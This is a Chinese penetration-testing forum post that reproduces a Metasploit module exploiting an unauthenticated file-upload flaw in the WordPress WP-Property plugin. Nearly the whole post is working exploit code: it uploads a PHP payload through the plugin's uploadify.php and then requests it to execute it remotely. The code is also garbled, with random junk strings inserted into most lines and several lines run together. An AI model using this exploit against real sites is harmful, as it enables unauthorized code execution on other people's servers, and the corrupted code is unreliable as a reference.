中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞0 N6 u: w' E* u) V# g+ f9 D
& c  T* x. ~" b7 a( T( B5 m# h
## # This file is part of the Metasploit Framework and may be subject to5 }0 ]% m6 F6 G: ^

* c0 P! b9 n  S9 I* y, f# redistribution and commercial restrictions. Please see the Metasploit
* b" n7 c7 e" B% Q7 M
" C' m9 d! H1 S: B7 c1 Q) p1 [# Framework web site for more information on licensing and terms of use.  S9 i' B! ], o4 {: ~! x3 x
5 H5 N- R4 z% B. G$ Y7 b
#   http://metasploit.com/framework/ ##& Q* G+ u6 V2 L7 R4 j' d
9 a9 C+ S$ G5 K" K% d
3 h5 \& \9 j8 x  Q% H

) N! d! w7 ^2 Q, i  [! c3 [
& i; B! r! s8 C7 y2 h; y1 J" [7 ?) |( A
require 'msf/core'
- y* }# m5 f; ^0 }# L. Q" z* f- Rrequire 'msf/core/exploit/php_exe'
4 V2 m( `3 C" N4 }
! ?1 O! o& V  e/ gclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',  u, m% l/ L3 S+ ?6 k
'Description'    => %q{& E; u4 W. ]2 x. {% E
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>( w& o! M4 X) [1 Q7 V3 `' o0 B1 e: m
[. {3 m0 r( a0 O
'Sammy FORGIT', # initial discovery/ g. V- U9 S0 \7 T$ p2 E
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
: a2 g4 ~1 ^$ Y  b3 ^5 m  l7 z# T],
1 g7 ^. ^$ ]; d* m0 R'License'        => MSF_LICENSE,. \5 A4 I  f3 g, e7 Y+ M
'References'     =>- S% N6 a- R% i  a
[' A$ L$ v% A/ t; z5 Q7 [
[ 'OSVDB', '82656' ],9 S' F* `6 |( I0 |. [4 r
[ 'BID', '53787' ],0 G* N* P' y8 D+ w% U, Q( @4 W
[ 'EDB', '18987'],/ S1 U+ u5 O, N# I
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
3 U1 R" J) f- C6 D6 a8 n! f7 E0 X],) A6 q/ d! G" L2 p' O( w+ G
'Payload'        =>4 v* y# @( o: C. s, n4 u
{+ W2 k. E% }. c; N( q4 `  J; S+ j8 v
'BadChars' => "\x00",
( Z$ A! o$ @! A- Y" b2 ?* e},9 m  T( ^* b+ l4 b) z
'Platform'       => 'php',
) q' R- E! Z% D! u6 T! W'Arch'           => ARCH_PHP,
* u' m: P5 c5 s9 t  h'Targets'        =>
, K6 H3 t+ o  }8 @2 R$ o3 M. ?[
2 [3 q9 A5 ^0 L8 @* @( C+ \[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],$ M' z2 N3 A! C2 y: q
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]1 [, ?5 \6 L/ V' q
],2 D! g, l' B/ K* K, E
'DefaultTarget'  => 0,# Y6 r  J. v6 q4 j( [
'DisclosureDate' => 'Mar 26 2012'))
0 b! `8 W$ |0 x/ v" i0 @, M+ o2 l
" q% q5 ~- ?- c  k5 Pregister_options(2 _1 o: B& _1 W" k" `6 E
[- N& ]! T6 [. d4 Q2 [5 Q7 u$ o$ U
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])& {1 R$ u6 i8 s; F) o( C
], self.class)+ m9 a1 b/ l7 @- L3 a: o( Y
end
+ ^0 W3 |& h! W* i* v/ @+ S
9 @5 u( g$ B3 @" S3 ^- F: I0 Hdef check
- x$ p& k: P/ ouri =  target_uri.path5 N* z; r7 G. v% K$ w
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',+ }8 s; @+ B9 h7 H6 u9 B* p. S( {
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"6 C; \: y7 R' t
})3 Z6 J" }' ]$ U/ F

8 ?. D# S, L5 ~# B' P: c- t& y- K* Oif not res or res.code != 200+ w4 X& n$ J8 V* d1 m
return Exploit::CheckCode::Unknown. ]$ b' \" w  e% o' T! v
end: y. j3 g) Q. A. H8 S3 V3 U! K( y

# k! N) D! }1 s. T: O6 ]return Exploit::CheckCode::Appears
. a% Q) [8 @* [. k7 d* Jend
/ I3 I" g: d9 o8 r( j" ?" B( b* l# w1 I6 ^7 e
def exploit
( C" m' j( ^6 i& l$ K( Ouri =  target_uri.path
8 z1 h& F' @- D7 w5 a8 U& luri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)7 ]: U3 Q3 h# `2 o8 }

2 Z/ ^2 o: Z) w2 o% zdata = Rex::MIME::Message.new- J  k& Q$ W8 ^" e& ^
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
5 ]* n6 Z! ~7 I% odata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
) J" L0 C, B" W& O) N" apost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# U7 T8 \. D/ M$ f6 [( S2 g- Y; H$ J. @! G4 N7 [
print_status("#{peer} - Uploading payload #{@payload_name}")
1 ~& }6 @( y. C* i5 b- k: {0 J- rres = send_request_cgi({
% @8 f# u$ Z  a- M  ['method' => 'POST',. W) f# e/ I9 a' M1 K$ j6 A
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
! S  C' z3 L+ k% R9 i% X7 v* F'ctype'  => "multipart/form-data; boundary=#{data.bound}",
. k. J+ p3 A% Z; \% S& U'data'   => post_data( L4 H( S8 g* k3 v4 _3 `
})7 L4 `1 k# J& M* d- y( d% C# N

* C6 L5 N0 o9 xif not res or res.code != 200 or res.body !~ /#{@payload_name}/
$ @; ~: T$ e% [+ J! A; f$ v& z" e1 Vfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; [! {, Y' Z: N+ Jend3 z/ q. m, [+ ~6 w8 h% i& Z
1 W, q1 A3 J' n3 K. R
upload_uri = res.body# ~' i7 Q/ h. q3 b! e2 X. {
( A# {9 |- e% U# V9 l
print_status("#{peer} - Executing payload #{@payload_name}")
; ?# b4 M  s: o* Pres = send_request_raw({
( T* [4 |- k% ^'uri'    => upload_uri,
9 M# T  J' }! b$ ]0 P'method' => 'GET'
9 P* d, |0 r8 f& o" R/ I% Q})
- R: a- i* z* \end  Z& o+ a6 s/ i2 }) N
end1 |9 E' j2 f" m
% s- ]$ P- l* ~1 c
不要问我这写的是什么 怎么利用 我是说msf.+ \) K+ Y: D6 D* ~$ y, R  L/ [

& P8 [' _% v5 W, s



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2